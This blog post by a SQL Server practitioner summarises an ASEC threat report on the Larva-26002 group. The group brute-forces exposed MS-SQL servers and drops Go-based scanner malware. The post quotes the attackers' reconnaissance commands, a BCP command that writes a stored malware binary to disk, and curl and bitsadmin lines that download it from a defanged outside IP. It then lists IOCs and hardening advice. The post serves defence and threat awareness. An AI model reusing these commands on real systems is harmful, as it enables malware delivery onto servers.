BCP. I love it. It's a workhorse — bulk copy data in, bulk copy data out, no drama. I've used it more times than I can count. Which is exactly why this stopped me cold: AhnLab's Security Intelligence Center (ASEC) published a confirmed attack report on March 20, 2026 showing an active threat group using BCP to drop malware directly onto SQL Server hosts. No software flaw. No zero-day. They got through a weak password on an internet-exposed server — and then they weaponized BCP. The simple tool we've all used, doing exactly what it was designed to do, except the 'data' being exported is a malware executable.
Who Is Behind This
ASEC tracks this group as Larva-26002. They've been targeting MS-SQL servers since at least January 2024 — starting with Trigona and Mimic ransomware against internet-exposed instances. Palo Alto Unit42 and Zscaler covered Trigona. Securonix tied Mimic to Turkish-speaking threat actors. In 2025, the same group came back with upgraded tools — Teramind alongside AnyDesk, and a new scanner rebuilt in Rust. Now it's 2026 and they've upgraded again. Same group, same targets, new tooling. This is a long-running, actively maintained operation.
How They Get In
Brute force and dictionary attacks against internet-exposed SQL Server instances with weak or default credentials. That's it. No exploit chain, no CVE. Just hammering logins until one works. Once inside, they run basic reconnaissance first for situational awareness:
hostname whoami ipconfig /all netstat -an tasklist tasklist /FI "IMAGENAME eq sqlservr.exe" /FO CSV /NH
Then the Call to BCP
The attacker stores the malware binary inside a database table and then uses BCP to export it to disk as an executable. This is the exact command ASEC documented:
bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\api.exe" -T -f "C:\ProgramData\FODsOZKgAU.txt"
Two things to note: the table name uGnzBdZbsi and the format file FODsOZKgAU.txt have not changed since the 2024 incident. ASEC confirmed these identifiers have been consistent across every documented attack cycle from 2024 to date. If you see either of those strings anywhere in your environment, stop whatever you are doing and investigate immediately.
Where BCP isn't available or fails, they fall back to curl, bitsadmin, or PowerShell to pull the payload from an external server:
curl -o "C:\programdata\api.exe" "hxxp://109.205.211[.]13/api.exe" bitsadmin /transfer job1 /download /priority high "hxxp://109.205.211[.]13/api.exe" "C:\programdata\api.exe"
What Gets Installed
The file being dropped at C:\ProgramData\api.exe is a downloader ASEC labeled 'ICE Cloud Launcher' — written in Go. It authenticates to a command-and-control (C&C) server and pulls down the actual payload: 'ICE Cloud Client,' also Go-based, drops with a randomized filename to disguise itself as a legitimate program.
ICE Cloud Client is a scanner and brute-force tool. It registers with the C&C server, receives a list of MS-SQL addresses to target along with a credential pair to try — they used ecomm/ecomm — and then successful logins go straight back to the C&C server. Your compromised SQL Server is now their scout.
Also interesting, the binary strings inside ICE Cloud are written in Turkish, clearly tying this 2026 campaign to the earlier Mimic ransomware operation.
The Part That Gets Me The Most
ASEC confirmed that in 2026, Larva-26002 attacked the same servers they compromised in 2024. Not similar servers — the same ones. They came back. Servers that were never properly cleaned up are being revisited on a recurring cycle, each time with the group's latest tooling.
Look at that three-year path: ransomware in 2024, Rust-based scanning in 2025, ICE Cloud scanning in 2026. They've moved away from ransomware toward credential scanning at scale, and they're building a hit list. A growing pool of compromised SQL Servers quietly probing for the next victim.
IOCs to Check Right Now
Everything below comes directly from the ASEC report. Confirmed indicators from the active 2026 campaign:
| Type | Value | Notes |
|---|---|---|
| Table name | uGnzBdZbsi |
Used to store malware payload since 2024 |
| Format file | FODsOZKgAU.txt |
BCP format file, consistent since 2024 |
| Dropped file | C:\ProgramData\api.exe |
ICE Cloud Launcher downloader |
| C&C IP | 109.205.211[.]13 |
Payload download and C&C server |
| Domain | hostroids[.]com |
Associated infrastructure |
MD5 hashes published by ASEC for the malware samples:
0a9f2e2ff98e9f19428da79680e80b77 28847cb6859b8239f59cbf2b8f194770 5200410ec674184707b731b697154522 7fbbf16256c7c89d952fee47b70ea759 89bf428b2d9214a66e2ea78623e8b5c9
What Should You Do?
If your SQL Server has any internet exposure — direct or through an application — start here:
Lock down port 1433.
SQL Server should not be reachable from the open internet. Firewall rules should restrict access to known, trusted IP ranges only. If you're not sure what's exposed, find out today.
Audit your SQL logins.
Default and simple credentials are the entry point. Dictionary attacks mean they're trying common passwords. Disable sa if it's not needed. If you have sa enabled with a weak password, or any login with credentials like ecomm/ecomm, change them immediately. Need to find them first? Here's how to find weak passwords using PWDCOMPARE.
Review BCP activity.
BCP is legitimate, but it has no business running unattended on a production server outside of a known, documented process. Check all SQL Server Agent jobs and Windows scheduled tasks for all BCP executions — and then verify each one is intended.
Check for the IOC artifacts.
Search for api.exe in C:\ProgramData\, the table name uGnzBdZbsi, and the format file FODsOZKgAU.txt. These strings have not changed across three years of active attacks. Look. For. Them.
If you were compromised before and 'cleaned up' — verify.
ASEC confirmed return visits to previously compromised servers. A cleanup that didn't include closing the original entry point, such as weak credentials or an exposed port, was not a full cleanup.
These aren't sophisticated attackers. They're patient ones. A weak password and an open port is all it took. Don't make it that easy for them.
More to Read
AhnLab ASEC: Attack Targeting MS-SQL Servers to Deploy the ICE Cloud Scanner (Larva-26002) — March 20, 2026
AhnLab ASEC: Larva-26002 Trigona and Mimic Ransomware Campaign — January 2024
AhnLab ASEC: Larva-26002 2025 Campaign (Rust-based scanner)
Palo Alto Unit42: Trigona Ransomware Update
Zscaler: Technical Analysis of Trigona Ransomware
Securonix: Turkish Hackers Target MS-SQL Servers with Mimic Ransomware
No comments:
Post a Comment